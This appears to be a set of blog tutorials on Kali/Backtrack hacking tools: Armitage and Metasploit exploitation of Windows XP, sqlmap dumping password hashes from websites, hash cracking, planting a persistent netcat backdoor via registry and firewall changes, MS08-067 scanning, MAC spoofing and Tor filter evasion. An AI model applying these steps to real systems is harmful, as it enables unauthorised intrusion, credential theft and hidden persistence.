Hacking With Armitage on Kali Linux / Backtrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

If you are beginning to learn, Armitage is not something you would want to start with. It is alright to quickly automate some routine Metasploit tasks using Armitage, but if you're trying to learn something, Armitage adds a level of abstraction and makes you a perfect script kiddie.

Learning stuff on 'msfconsole' or 'msfcli' before moving on to Armitage, is a better approach in my opinion.

The tool is mostly self-explanatory due to its GUI.

Here, I am simulating an attack on a Windows XP system using Armitage on Kali Linux.

Bring up Armitage by typing:

#service postgresql start
#armitage

First, I need to 'discover' this host.

Hosts -> nmap scan

OR, I could manually 'add host' by providing its IP.
 
Now I can see this windows XP host in Armitage workspace. From here, I could manually search for vulnerabilities on the Windows XP and then try to exploit them, but I chose the easy way on Armitage, which is 'Hail Mary'.

Attacks -> Hail Mary

It tried some common exploits relating to available services on victim machine and gave me the 'red' around that host, which means the host is compromised.

I grab the password hashes that I can try to crack later on.

I gain access to cmd.exe 'command prompt' in windows.

 I set up a persistant Meterpreter backdoor on the hacked windows XP for later access.

I view the processes running on hacked machine.

I take screenshots of activities on the hacked machine.

 I tried connecting with VNC viewer to the remote machine.

If you're a part of a Pen Test team, then one of you can host an Armitage server and other can 'connect' to it, so that you can collaborate on the project.

At the connect window, you need to enter the host name of the fellow Pen Tester hosting the Armitage server, the port number, and the username and password that he/she has provided you.

At the next window, confirm the fingerprint.

Pick a 'Handle' for the session.

And then you can join in with your Pen Test Team and work in collaboration on the project

There's a bunch of other stuff you could do with Armitage, please feel free to explore further.

How To Hack A Website - Simple Demo | Kali Linux / BackTrack | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn


I was testing for SQL vulnerabilities at random over the Internet and found a whole lot of websites that are still vulnerable to SQL injections. I refrained from any further testing due to lack of explicit permission by owners.However, here's a demonstration--from one of my penetration testing projects--of how these websites may be hacked if the SQL vulnerabilities are left unpatched.

Tip: Read up a little on SQL injection. For example, start with figuring out what this is trying to do:

SELECT * FROM users WHERE name = '' OR '1'='1';

The tool sqlmap comes preloaded with both Kali and Backtrack.

If the dynamic parameter in the php script is vulnerable then sqlmap will try to inject code into it.

I've blacked out the website's information for obvious reasons.

First, get the tool to list the available databases:

The 'information_schema' DB is where MySQL stores the schema, so I'm not interested in that one. The other one is my target.

I try to grab the 'tables' available in this other database:

There are a bunch of tables that get listed, among those the table 'members' looks interesting, grab the columns for that table:

 And I see a column with passwords, I'll get the hashes here (I've seen some web admins who are so careless that they store the passwords in plaintext which would require no password cracking):

Finally, I get my hands on the password hashes and the reverse engineering begins from there (use jtr):

Unless you actually know what sqlmap did for you in the background, it is not that interesting and makes you a perfect script kiddie.

Once you crack the password hashes, you can login to the website's control panel as 'admin' and then change html files (index.html for homepage). That would be website defacing.

Disclaimer: As stated in the beginning, this excerpt is from an authorized penetration test. If you notice an SQL weakness in a website, please refrain from engaging in illicit activities and inform the web administrator.

Using ophcrack in Kali Linux / Backtrack to Crack Hashes | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn


Ophcrack is GUI tool that can be used for the purpose of cracking password hashes. Perhaps the main attraction of using this tool is its ability to deploy rainbow tables while cracking the password. This makes the process of brute force cracking faster.

At this point, it is essential that you understand the importance of rainbow tables in a brute force attack. As you know, a hash is a one way function and cannot be reversed. So we can't convert the password hashes back to their corresponding plaintext forms. For this reason, during a brute force attack, we take a potential passphrase (in plaintext) and convert it to its hash form. Then we can compare this hash with the password hash and if there is a match, we know that this plaintext is the passphrase. Basically, during a brute force attack, a lot of time and CPU power is wasted in computing the hashes. Rainbow tables are 'pre-computed hashes'. So once you have a rainbow table, all you need to do is 'compare' the hash in the rainbow table to the password hash you have obtained during penetration testing. Hence, you save considerable time and CPU cycles while hunting to the plaintext form of the passphrase.

Here's an example where I cracked some LM Hashes I grabbed from a machine during penetration testing (the hashes were obtained by using pwdump in Meterpreter).

You can load up any of these rainbow tables germane to the victim's OS. Click on 'install' to obtain them. They are large files and will take a while to download depending on your network bandwidth.

Ophcrack can speed up the Windows password cracking process during penetration testing, and if you test Windows system frequently, it would be prudent to have these rainbow tables saved on your local disk.

Hacking with Meterpreter Session on Kali linux / Backtrack | Post Exploitation

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

In my last post, I demonstrated how a vulnerable system can be discovered quickly using the nmap tool. We used the script 'smb-check-vulns.nse' belonging to the 'vuln' category. We used it in 'unsafe' mode which is very likely to crash the victim machine.

In this one, I exploit that system using Metasploit and obtain a meterpreter session:

We need to set the 'rhost' or remote host, the payload, and the 'lhost' or localhost. The standard Metasploit command 'exploit' will then run the module with these parameters configured.

Now:

- We can try to dump the password hashes of this system.

- We can upload and execute a nc.exe (netcat) file on hacked system to gain access later (backdoor).

Uploading Netcat on Hacked Machine as a Backdoor | Kali Linux / Backtrack | Post Exploitation

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Netcat, the swiss army knife, can be used as a backdoor but I would advise against it because it has no authentication. Anyone who finds netcat server on the victim's computer can control that machine.

First, upload Netcat on the remote machine (it is present in "/usr/share/windows-binaries" path in Kali Linux or Backtrack).

Next, enumerate the registry keys in the 'run' category (that run after each reboot).

Now use 'reg setval' to set the value under 'run' in the registry of victim's machine.

Then use 'reg queryval' to see that it's successfully added.

Use the 'netsh firewall add portopening' command in Windows shell to allow port opening at 455 (where netcat will listen).

Execute nc.exe using:

#meterpreter> execute -f nc.exe

Now you will see nc.exe as a process on victim's machine.

Using nmap 'Script' to Quickly Scan for One Particular Vulnerability (MS08-067) | Kali Linux / Backtrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

I usually scan for vulnerabilities using the Nessus Scanner but its "big and heavy" and takes time to scan hosts for all the vulnerabilities depending on the plugins available. Although, Nessus has the option to scan for a particular vulnerability, here I discuss a better and quicker way to do it.

A time came when the trustworthy MS08-067 NetApi Vulnerability became my favorite when hunting for vulnerable XP boxes during a penetration test. It is reliable and always gave me root access on compromised machine without crashing it. So I started looking for a way to quickly scan test networks for a computer with MS08-067 vulnerability before I moved onto others.

I discovered that it can be done using the Nmap scripting engine.

#  nmap -oA 192168-filename -sS -p445 --script smb-check-vulns.nse 172.19.8.0/24 --script-args=unsafe=1

Be careful using the 'unsafe' option as it is likely to crash the victim machine. After completion of the scan, I found a system vulnerable. Note that the script also tests for the presence of the Conficker worm infection.

After discovering the vulnerability, I penetrated the system and planted the classic Netcat backdoor on it and then hid the backdoor using Aphex rootkit.

How to Change your Mac / Hardware Address in Kali Linux / Backtrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Macchanger is a tool already available in Kali Linux or Backtrack.  It lets you change the hardware address pertaining to a particular interface on your machine. For instance, as 'eth0' or 'wlan0' are the interfaces for wired and wireless connection respectively, here's how you would use it:

Here, the option 'r' is used to tell macchanger to use a 'random' MAC address. The option 'A' is used to set the random vendor MAC of any kind, while 'a' is used to set the random vendor MAC of the same kind.

You can also specify the MAC address that you want to use by using the option 'm' as shown in the figure.

In case you want your machine to acquire a random MAC address every time you restart the machine, you can do so by storing the following command in the '/etc/network/interfaces' file:

pre-up ifconfig eth0 hw ether 00:00:00:00:00:00

Here, the MAC address '00:00:00:00:00:00' will be allocated to your machine each time you restart it.

Update: If you get an error while you are trying to spoof your MAC address using macchanger, it is probably because you are trying to change the hardware address of that interface while it is 'up'. This is similar to trying to change a car's tire while it is in motion--maybe not the best example, but you get the idea. You need to put the interface 'down' first. Then change the hardware address using macchanger, and then bring it 'up' again.

#ifconfig wlan0 down
#macchanger -r wlan0
#ifconfig wlan0 up

Using nbtscan in Kali Linux / Backtrack to Quickly scan for Hosts Alive

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

'nbtscan' is a quick tool which gives instant results concerning which hosts are alive on your network and replying to netbios queries

Here, I have scanned a Range of IPs to see which ones are up

Notice the '1/24' in the end. It meant that I want to scan all 255 IPs in that range. IPV4 IP address is 32 bit in size, so '1/24' simply means that 'keep the first 24 bits constant and increment the last 8 bits by 1 each time. OR, I could use '1-255'  instead of using '1/24' . Try and see what happens when you use '1/16' instead.

Read more on CIDR Notation to understand this further.

Using Nessus in Kali Linux / Backtrack To Scan For Vulnerabilities | How To

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Read my Post on Setting up on Nessus, if you haven't got it set up yet.

After logging into Nessus, goto 'Scans' -> 'Create new scan'

Here, give a name to the scan (I usually use current Date).

'Run now' (or schedule scan for later).

Type of scan -> Select "Internal network scan' for local scan

Give it a host address (192.168.0.10) or a host-range (192.168.0.1/24) or a host list file.

Go ahead and initiate the scan and wait while it populates the vulnerabilities present in scanned hosts.

It can give you a hosts summary in this manner:

Or, you can arrange the vulnerabilities by decreasing priority:

After the Scan, move to the 'Results' Page:

You also 'Export' the result in various formats like '.nessus' or 'PDF' or 'HTML' :

Logout of Nessus after you are done.

Using Tor and Privoxy on Kali / Debian / Backtrack Linux To Anonymize Internet Surfing or Open Blocked Websites

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Freedom of expression and speech is your fundamental right and if they try to take that away from you by blocking access to specific websites, then the tools mentioned in this post will aid you in defeating censorship.

They recently blocked websites like HackThisSite on the network that I use, categorizing them as "Hacking". Their intentions are good I'm sure but I need to visit such websites.

Anyway, I decided to use a proxy website (which is not always reliable since they will block access to those as well). As I suspected, it was blocked under 'Proxy Avoidance'.

Set up the onion router to get around this. First, you need to install it on your box using the following command:

# apt-get install tor privoxy

This will install 2 separate packages 'Tor' and 'Privoxy'.

Tor will host a proxy server on your machine on port 9050 of type 'Socks5'

Privoxy will host a proxy service on your machine on port 8118 of type 'HTTP'

Also install the GUI for tor called 'vidalia'

# apt-get install vidalia polipo

 Now, edit the Privoxy configuration file:

# vi /etc/privoxy/config

Add this line at the bottom of this file:

forward-socks4a / localhost:9050 .

Save and close the file. This will tell privoxy to forward Socks traffic to the Service running on port 9050 on your localhost (this service is Tor)

Time to fire up Tor and privoxy services:

# /etc/init.d/tor start
# /etc/init.d/privoxy start

Now goto Application -> Internet -> Vidalia

Check that it says 'connected to tor network'

You can click on 'view the network' to see all the relays that you are passing through.

Now goto your browser and set the proxy to:

Proxy IP -  '127.0.0.1'
Proxy port  - 9050
Type - Socks5

Note: If you are using the FireFox or Iceweasel browser, you can use 'AutoProxy' add-on to set this up.

Reload the website that was blocked earlier, if you've done it right, you should have access to it.

Furthermore, all your browsing is now anonymous since you are connected through the onion router.

Installing Flash Player on Backtrack or Kali Linux

By default the browser would give the 'flash-plugin required error' when try to open flash videos on Backtrack or Kali linux. It doesn't take much to fix that though.
Get the latest install_flash_player_....tar.gz from adobe (the tarball)
Then Follow these steps mentioned on backtrack website:

root@bt:~# mkdir -p ~/.mozilla/plugins
root@bt:~# mkdir flash
root@bt:~# mv -f install_flash_player_11_linux.i386.tar.gz flash/
root@bt:~# cd flash/
root@bt:~/flash# tar xvfz install_flash_player_11_linux.i386.tar.gz
root@bt:~/flash# cp -f libflashplayer.so ~/.mozilla/plugins/

Restart your Browser and your flash player should work fine now.

 

Additional instructions for Kali Linux

1. Simply download the 'install_flash_.....tar.gz' file from the get.adobe.com

2. Extract:

#tar -xvzf install_flash_.......tar.gz

3. Move the libflashplayer.so plugin to '/usr/lib/mozilla/plugins/'

#mv libflashplayer.so /usr/lib/mozilla/plugins/

Restart your Browser and your flash player should work fine now.

BackTrack : Could not connect to wicd's D-Bus interface error : Found Solution

Found the solution to this annoying bug on BT wiki here.